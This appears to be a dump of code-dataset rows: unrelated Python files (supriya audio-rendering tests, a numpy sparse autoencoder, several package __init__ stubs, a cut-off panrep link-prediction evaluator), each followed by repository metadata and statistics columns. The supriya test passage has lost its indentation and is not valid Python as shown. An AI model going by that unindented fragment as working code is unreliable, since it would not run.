Non-session renderable NRT input.
"""
say = supriya.soundfiles.Say("Some text.")
session = supriya.nonrealtime.Session(1, 1, input_=say)
synthdef = pytest.helpers.build_multiplier_synthdef(1)
with session.at(0):
session.add_synth(
synthdef=synthdef,
duration=2,
in_bus=session.audio_input_bus_group,
out_bus=session.audio_output_bus_group,
multiplier=0.5,
)
assert session.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
[
"/s_new",
"85c1d1b6f6c9b59c042b53d39019b8f5",
1000,
0,
0,
"in_bus",
1,
"multiplier",
0.5,
"out_bus",
0,
],
],
],
[2.0, [["/n_free", 1000], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-ea2ca28c15208db4fce5eb184d0b9257
source:
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
def test_10(nonrealtime_paths):
"""
Non-session renderable DiskIn input.
"""
say = supriya.soundfiles.Say("Some text.")
session = supriya.nonrealtime.Session(0, 1)
synthdef = pytest.helpers.build_diskin_synthdef(channel_count=1)
with session.at(0):
buffer_ = session.cue_soundfile(say, duration=2)
session.add_synth(synthdef=synthdef, buffer_id=buffer_, duration=2)
assert session.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(synthdef.compile())],
["/b_alloc", 0, 32768, 1],
[
"/b_read",
0,
"say-5f2b51ca2fdc5baa31ec02e002f69aec.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"9c69c44ff72c62dfa4c2f0a0e99f05ce",
1000,
0,
0,
"buffer_id",
0,
],
],
],
[2.0, [["/n_free", 1000], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-96c65c92f6d0d0bbb08d85720d16a383
source:
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
def test_11(nonrealtime_paths):
"""
Chained session and non-session inputs.
"""
multiplier_synthdef = pytest.helpers.build_multiplier_synthdef(1)
diskin_synthdef = pytest.helpers.build_diskin_synthdef(channel_count=1)
say = supriya.soundfiles.Say("Some text.")
session_one = supriya.nonrealtime.Session(1, 1, input_=say)
with session_one.at(0):
session_one.add_synth(
synthdef=multiplier_synthdef,
duration=2,
in_bus=session_one.audio_input_bus_group,
out_bus=session_one.audio_output_bus_group,
multiplier=0.5,
)
session_two = supriya.nonrealtime.Session(1, 1, input_=session_one)
with session_two.at(0):
session_two.add_synth(
synthdef=multiplier_synthdef,
duration=2,
in_bus=session_two.audio_input_bus_group,
out_bus=session_two.audio_output_bus_group,
multiplier=-0.5,
)
buffer_ = session_two.cue_soundfile(say, duration=2)
session_two.add_synth(synthdef=diskin_synthdef, buffer_id=buffer_, duration=2)
assert session_two.to_lists() == [
[
0.0,
[
["/d_recv", bytearray(multiplier_synthdef.compile())],
["/d_recv", bytearray(diskin_synthdef.compile())],
["/b_alloc", 0, 32768, 1],
[
"/b_read",
0,
"say-5f2b51ca2fdc5baa31ec02e002f69aec.aiff",
0,
-1,
0,
1,
],
[
"/s_new",
"85c1d1b6f6c9b59c042b53d39019b8f5",
1000,
0,
0,
"in_bus",
1,
"multiplier",
-0.5,
"out_bus",
0,
],
[
"/s_new",
"9c69c44ff72c62dfa4c2f0a0e99f05ce",
1001,
0,
0,
"buffer_id",
0,
],
],
],
[2.0, [["/n_free", 1000, 1001], ["/b_close", 0], ["/b_free", 0], [0]]],
]
exit_code, _ = session_two.render(
nonrealtime_paths.output_file_path,
render_directory_path=nonrealtime_paths.render_directory_path,
build_render_yml=True,
)
assert nonrealtime_paths.render_yml_file_path.exists()
with nonrealtime_paths.render_yml_file_path.open() as file_pointer:
file_contents = uqbar.strings.normalize(file_pointer.read())
assert file_contents == uqbar.strings.normalize(
"""
render: session-9d80db1d391da3ab4f1cab54a0963d44
source:
- session-ea2ca28c15208db4fce5eb184d0b9257
- say-5f2b51ca2fdc5baa31ec02e002f69aec
"""
)
| 38.210478 | 150 | 0.538138 | 5,294 | 41,573 | 4.030978 | 0.035323 | 0.033927 | 0.041893 | 0.052484 | 0.864855 | 0.841753 | 0.809841 | 0.779335 | 0.760309 | 0.73299 | 0 | 0.184318 | 0.322036 | 41,573 | 1,087 | 151 | 38.24563 | 0.572822 | 0.015876 | 0 | 0.683106 | 0 | 0.005247 | 0.122599 | 0.073677 | 0 | 0 | 0 | 0 | 0.099685 | 1 | 0.01469 | false | 0 | 0.008395 | 0 | 0.023085 | 0.005247 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
70a84457531caecb5cc4cc52ff5e2095569e0547 | 48 | py | Python | lahja/tools/benchmark/__init__.py | gsalgado/lahja | 53526e531e8efac0924bbfe28ddcda226044aee7 | [
"MIT"
] | 400 | 2018-08-30T13:01:01.000Z | 2022-02-24T01:49:47.000Z | lahja/tools/benchmark/__init__.py | gsalgado/lahja | 53526e531e8efac0924bbfe28ddcda226044aee7 | [
"MIT"
] | 122 | 2018-08-30T14:59:34.000Z | 2020-08-05T22:11:07.000Z | lahja/tools/benchmark/__init__.py | lithp/lahja | 595a0f52ff825e12ecf244b80dd73e1a88e71d54 | [
"MIT"
] | 22 | 2018-09-12T15:50:40.000Z | 2022-03-28T18:51:29.000Z | from .stats import LocalStatistic # noqa: F401
| 24 | 47 | 0.770833 | 6 | 48 | 6.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0.166667 | 48 | 1 | 48 | 48 | 0.85 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b1fcee3a756c463a6e129c317223801c57f0913 | 7,575 | py | Python | sparse_autoencoder.py | kaixinhuaihuai/ufldl_tutorial | 8e4a6724342dfd4cd3a8211f60b6ef9a4137e5ce | [
"MIT"
] | 595 | 2015-01-06T06:59:39.000Z | 2022-03-30T11:56:56.000Z | sparse_autoencoder.py | 493238731/ufldl_tutorial | 8e4a6724342dfd4cd3a8211f60b6ef9a4137e5ce | [
"MIT"
] | 8 | 2015-02-23T23:41:21.000Z | 2018-12-11T15:53:22.000Z | sparse_autoencoder.py | 493238731/ufldl_tutorial | 8e4a6724342dfd4cd3a8211f60b6ef9a4137e5ce | [
"MIT"
] | 334 | 2015-01-05T01:39:15.000Z | 2021-12-21T10:19:55.000Z | import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def sigmoid_prime(x):
return sigmoid(x) * (1 - sigmoid(x))
def KL_divergence(x, y):
return x * np.log(x / y) + (1 - x) * np.log((1 - x) / (1 - y))
def initialize(hidden_size, visible_size):
# we'll choose weights uniformly from the interval [-r, r]
r = np.sqrt(6) / np.sqrt(hidden_size + visible_size + 1)
W1 = np.random.random((hidden_size, visible_size)) * 2 * r - r
W2 = np.random.random((visible_size, hidden_size)) * 2 * r - r
b1 = np.zeros(hidden_size, dtype=np.float64)
b2 = np.zeros(visible_size, dtype=np.float64)
theta = np.concatenate((W1.reshape(hidden_size * visible_size),
W2.reshape(hidden_size * visible_size),
b1.reshape(hidden_size),
b2.reshape(visible_size)))
return theta
# visible_size: the number of input units (probably 64)
# hidden_size: the number of hidden units (probably 25)
# lambda_: weight decay parameter
# sparsity_param: The desired average activation for the hidden units (denoted in the lecture
# notes by the greek alphabet rho, which looks like a lower-case "p").
# beta: weight of sparsity penalty term
# data: Our 64x10000 matrix containing the training data. So, data(:,i) is the i-th training example.
#
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
# Returns: (cost,gradient) tuple
def sparse_autoencoder_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = sigmoid(z3)
# Sparsity
rho_hat = np.sum(a2, axis=1) / m
rho = np.tile(sparsity_param, hidden_size)
# Cost function
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2)) + \
beta * np.sum(KL_divergence(rho, rho_hat))
# Backprop
sparsity_delta = np.tile(- rho / rho_hat + (1 - rho) / (1 - rho_hat), (m, 1)).transpose()
delta3 = -(data - h) * sigmoid_prime(z3)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
# After computing the cost and gradient, we will convert the gradients back
# to a vector format (suitable for minFunc). Specifically, we will unroll
# your gradient matrices into a vector.
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
def sparse_autoencoder(theta, hidden_size, visible_size, data):
"""
:param theta: trained weights from the autoencoder
:param hidden_size: the number of hidden units (probably 25)
:param visible_size: the number of input units (probably 64)
:param data: Our matrix containing the training data as columns. So, data(:,i) is the i-th training example.
"""
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
return a2
# visible_size: the number of input units (probably 64)
# hidden_size: the number of hidden units (probably 25)
# lambda_: weight decay parameter
# sparsity_param: The desired average activation for the hidden units (denoted in the lecture
# notes by the greek alphabet rho, which looks like a lower-case "p").
# beta: weight of sparsity penalty term
# data: Our 64x10000 matrix containing the training data. So, data(:,i) is the i-th training example.
#
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
# Returns: (cost,gradient) tuple
def sparse_autoencoder_linear_cost(theta, visible_size, hidden_size,
lambda_, sparsity_param, beta, data):
# The input theta is a vector (because minFunc expects the parameters to be a vector).
# We first convert theta to the (W1, W2, b1, b2) matrix/vector format, so that this
# follows the notation convention of the lecture notes.
W1 = theta[0:hidden_size * visible_size].reshape(hidden_size, visible_size)
W2 = theta[hidden_size * visible_size:2 * hidden_size * visible_size].reshape(visible_size, hidden_size)
b1 = theta[2 * hidden_size * visible_size:2 * hidden_size * visible_size + hidden_size]
b2 = theta[2 * hidden_size * visible_size + hidden_size:]
# Number of training examples
m = data.shape[1]
# Forward propagation
z2 = W1.dot(data) + np.tile(b1, (m, 1)).transpose()
a2 = sigmoid(z2)
z3 = W2.dot(a2) + np.tile(b2, (m, 1)).transpose()
h = z3
# Sparsity
rho_hat = np.sum(a2, axis=1) / m
rho = np.tile(sparsity_param, hidden_size)
# Cost function
cost = np.sum((h - data) ** 2) / (2 * m) + \
(lambda_ / 2) * (np.sum(W1 ** 2) + np.sum(W2 ** 2)) + \
beta * np.sum(KL_divergence(rho, rho_hat))
# Backprop
sparsity_delta = np.tile(- rho / rho_hat + (1 - rho) / (1 - rho_hat), (m, 1)).transpose()
delta3 = -(data - h)
delta2 = (W2.transpose().dot(delta3) + beta * sparsity_delta) * sigmoid_prime(z2)
W1grad = delta2.dot(data.transpose()) / m + lambda_ * W1
W2grad = delta3.dot(a2.transpose()) / m + lambda_ * W2
b1grad = np.sum(delta2, axis=1) / m
b2grad = np.sum(delta3, axis=1) / m
# After computing the cost and gradient, we will convert the gradients back
# to a vector format (suitable for minFunc). Specifically, we will unroll
# your gradient matrices into a vector.
grad = np.concatenate((W1grad.reshape(hidden_size * visible_size),
W2grad.reshape(hidden_size * visible_size),
b1grad.reshape(hidden_size),
b2grad.reshape(visible_size)))
return cost, grad
| 41.620879 | 113 | 0.648845 | 1,093 | 7,575 | 4.379689 | 0.137237 | 0.098183 | 0.099436 | 0.122833 | 0.883225 | 0.866722 | 0.854188 | 0.854188 | 0.854188 | 0.830374 | 0 | 0.033698 | 0.24 | 7,575 | 181 | 114 | 41.850829 | 0.797811 | 0.387327 | 0 | 0.679012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08642 | false | 0 | 0.012346 | 0.037037 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3b3fc9ed928bc126ca055a9b7063665f83738c27 | 182 | py | Python | python/anyascii/_data/_1ec.py | casept/anyascii | d4f426b91751254b68eaa84c6cd23099edd668e6 | [
"ISC"
] | null | null | null | python/anyascii/_data/_1ec.py | casept/anyascii | d4f426b91751254b68eaa84c6cd23099edd668e6 | [
"ISC"
] | null | null | null | python/anyascii/_data/_1ec.py | casept/anyascii | d4f426b91751254b68eaa84c6cd23099edd668e6 | [
"ISC"
] | null | null | null | b=' Rs' | 182 | 182 | 0.016484 | 2 | 182 | 1.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.967033 | 182 | 1 | 182 | 182 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0.972678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3b445befd9d54e0da3d6c58371274e2317e66812 | 141 | py | Python | nisnap/__init__.py | jhuguetn/nisnap | b65201a28499dcd851dbf36b4ade6aff943b8702 | [
"MIT"
] | null | null | null | nisnap/__init__.py | jhuguetn/nisnap | b65201a28499dcd851dbf36b4ade6aff943b8702 | [
"MIT"
] | null | null | null | nisnap/__init__.py | jhuguetn/nisnap | b65201a28499dcd851dbf36b4ade6aff943b8702 | [
"MIT"
] | null | null | null | __version__ = '0.3.7.post1'
from nisnap import snap
from nisnap import xnat
from nisnap.snap import plot_segment
__all__ = ['snap', 'xnat']
| 20.142857 | 36 | 0.751773 | 22 | 141 | 4.409091 | 0.590909 | 0.309278 | 0.329897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033058 | 0.141844 | 141 | 6 | 37 | 23.5 | 0.768595 | 0 | 0 | 0 | 0 | 0 | 0.134752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b48046eec62193bdeb95a1a518c6ff840afcab8 | 42 | py | Python | app/models/neural_one_layer/__init__.py | carbonpredict/carbonpredict | 702c761287ce4e088ae1817a88958a438a3cc006 | [
"MIT"
] | null | null | null | app/models/neural_one_layer/__init__.py | carbonpredict/carbonpredict | 702c761287ce4e088ae1817a88958a438a3cc006 | [
"MIT"
] | 27 | 2020-06-11T11:00:15.000Z | 2020-09-01T20:08:54.000Z | app/models/neural_one_layer/__init__.py | carbonpredict/carbonpredict | 702c761287ce4e088ae1817a88958a438a3cc006 | [
"MIT"
] | 1 | 2020-07-23T09:08:06.000Z | 2020-07-23T09:08:06.000Z | from .impl import NeuralNetworkOneLayerFF
| 21 | 41 | 0.880952 | 4 | 42 | 9.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3b58f4619f15e75c9f0ba542f13cdf9966224df7 | 48 | py | Python | zxsegmentation/models/__init__.py | haofengsiji/zxsegmentation | 5f8117b7104bea28792ef32e83e3820782bbced9 | [
"Apache-2.0"
] | null | null | null | zxsegmentation/models/__init__.py | haofengsiji/zxsegmentation | 5f8117b7104bea28792ef32e83e3820782bbced9 | [
"Apache-2.0"
] | null | null | null | zxsegmentation/models/__init__.py | haofengsiji/zxsegmentation | 5f8117b7104bea28792ef32e83e3820782bbced9 | [
"Apache-2.0"
] | null | null | null | from .fcn_model import vgg16, fcn32, fcn16, fcn8 | 48 | 48 | 0.791667 | 8 | 48 | 4.625 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0.125 | 48 | 1 | 48 | 48 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ec87da9506e40052e00884d12cf0bc44c26cc02 | 44 | py | Python | torchexpo/nlp/__init__.py | torchexpo/torchexpo | 88c875358e830065ee23f49f47d4995b5b2d3e3c | [
"Apache-2.0"
] | 23 | 2020-09-08T05:08:46.000Z | 2021-08-12T07:16:53.000Z | torchexpo/nlp/__init__.py | torchexpo/torchexpo | 88c875358e830065ee23f49f47d4995b5b2d3e3c | [
"Apache-2.0"
] | 1 | 2021-12-05T06:15:18.000Z | 2021-12-20T08:10:19.000Z | torchexpo/nlp/__init__.py | torchexpo/torchexpo | 88c875358e830065ee23f49f47d4995b5b2d3e3c | [
"Apache-2.0"
] | 2 | 2021-01-12T06:10:53.000Z | 2021-07-24T08:21:59.000Z | from torchexpo.nlp import sentiment_analysis | 44 | 44 | 0.909091 | 6 | 44 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 44 | 1 | 44 | 44 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ecda2bff9d738154f77f5b226af2acd07e642e4 | 46 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_random_Numbers.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_random_Numbers.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/Python_random_Numbers.txt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | import random
print(random.randrange(1, 10))
| 11.5 | 30 | 0.76087 | 7 | 46 | 5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 0.108696 | 46 | 3 | 31 | 15.333333 | 0.780488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
8ee9d9b0f9a4ea5f8552683462f90d52da39aea3 | 90 | py | Python | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | tensor/main_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | from tensor.struct.tensor_module import Tensor
from tensor.tostring_module import Tensor
| 22.5 | 46 | 0.866667 | 13 | 90 | 5.846154 | 0.461538 | 0.263158 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 90 | 3 | 47 | 30 | 0.938272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d97eada3d7e3e909f80cf879b310862337d98ebe | 63 | py | Python | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 30 | 2017-02-10T13:12:09.000Z | 2021-11-02T14:51:20.000Z | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 239 | 2016-09-21T22:16:25.000Z | 2021-06-22T05:37:23.000Z | afqbrowser/__init__.py | dweiss044/AFQ-Browser | e4c47a88d9e179999d51045af6be65391f250f86 | [
"BSD-3-Clause"
] | 9 | 2016-10-10T21:15:22.000Z | 2021-06-03T16:04:06.000Z | from .browser import * # noqa
from .gh_pages import * # noqa
| 21 | 31 | 0.68254 | 9 | 63 | 4.666667 | 0.666667 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 63 | 2 | 32 | 31.5 | 0.857143 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9966b7415918ffd0d110c683f27ab1ba0a3755b | 58,054 | py | Python | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 10 | 2020-12-18T22:53:43.000Z | 2021-12-13T19:07:25.000Z | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | null | null | null | panrep/evaluation.py | amazon-research/panrep | 57e6f71bb70c0908f3db28be97af0d818a863e19 | [
"Apache-2.0"
] | 1 | 2021-10-30T12:33:55.000Z | 2021-10-30T12:33:55.000Z | '''
This file contains functions to evaluate the link prediction and node classification tasks
'''
import time
import dgl
import numpy as np
import torch
import torch as th
from sklearn.cluster import KMeans
from sklearn.metrics import f1_score, normalized_mutual_info_score, adjusted_rand_score, roc_auc_score
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from torch.nn import functional as F
from torch.utils.data import DataLoader
from classifiers import DLinkPredictorOnlyRel, ClassifierMLP
from node_sampling_masking import InfomaxNodeRecNeighborSampler, LinkPredictorEvalSampler
def evaluation_link_prediction_wembeds(test_g,model, embeddings,train_edges,valid_edges,test_edges,dim_size,eval_neg_cnt,n_layers,device):
def transform_triplets(train_edges,etype2id,ntype2id):
train_src = None
# TODO have to map the etype and ntype to their integer ids.
for key in train_edges.keys():
if train_src is None:
train_src = train_edges[key][0]
train_dst = train_edges[key][1]
train_rel = th.tensor(etype2id[key[1]]).repeat((train_src.shape[0]))
train_src_type = th.tensor(ntype2id[key[0]]).repeat((train_src.shape[0]))
train_dst_type = th.tensor(ntype2id[key[2]]).repeat((train_src.shape[0]))
else:
train_src = torch.cat((train_src, train_edges[key][0]))
train_dst = torch.cat((train_dst, train_edges[key][1]))
train_rel = torch.cat((train_rel, th.tensor(etype2id[key[1]]).repeat((train_edges[key][0].shape[0]))))
train_src_type = torch.cat(
(train_src_type, th.tensor(ntype2id[key[0]]).repeat((train_edges[key][0].shape[0]))))
train_dst_type = torch.cat(
(train_dst_type, th.tensor(ntype2id[key[2]]).repeat((train_edges[key][0].shape[0]))))
perm=torch.randperm(train_src.shape[0])
train_src=train_src[perm]
train_dst = train_dst[perm]
train_src_type = train_src_type[perm]
train_rel = train_rel[perm]
train_dst_type = train_dst_type[perm]
return (train_src,train_dst,train_src_type,train_rel,train_dst_type)
def prepare_triplets(train_data, valid_data, test_data):
if len(train_data) == 3:
train_src, train_rel, train_dst = train_data
train_htypes = None
train_ttypes = None
else:
assert len(train_data) == 5
train_src, train_dst, train_src_type, train_rel, train_dst_type = train_data
train_htypes = (train_src_type)
train_ttypes = (train_dst_type)
head_ids = (train_src)
tail_ids = (train_dst)
etypes = (train_rel)
num_train_edges = etypes.shape[0]
# pos_seed = th.arange(batch_size * 5000) #num_train_edges//batch_size) * batch_size)
if len(valid_data) == 3:
valid_src, valid_rel, valid_dst = valid_data
valid_htypes = None
valid_ttypes = None
valid_neg_htypes = None
valid_neg_ttypes = None
else:
assert len(valid_data) == 5
valid_src, valid_dst, valid_src_trype, valid_rel, valid_dst_type = valid_data
valid_htypes = (valid_src_trype)
valid_ttypes = (valid_dst_type)
valid_neg_htypes = th.cat([train_htypes, valid_htypes])
valid_neg_ttypes = th.cat([train_ttypes, valid_ttypes])
valid_head_ids = (valid_src)
valid_tail_ids = (valid_dst)
valid_etypes = (valid_rel)
valid_neg_head_ids = th.cat([head_ids, valid_head_ids])
valid_neg_tail_ids = th.cat([tail_ids, valid_tail_ids])
valid_neg_etypes = th.cat([etypes, valid_etypes])
num_valid_edges = valid_etypes.shape[0] + num_train_edges
valid_seed = th.arange(valid_etypes.shape[0])
if len(test_data) == 3:
test_src, test_rel, test_dst = test_data
test_htypes = None
test_ttypes = None
test_neg_htypes = None
test_neg_ttypes = None
else:
assert len(test_data) == 5
test_src, test_dst, test_src_type, test_rel, test_dst_type = test_data
test_htypes = (test_src_type)
test_ttypes = (test_dst_type)
test_neg_htypes = th.cat([valid_neg_htypes, test_htypes])
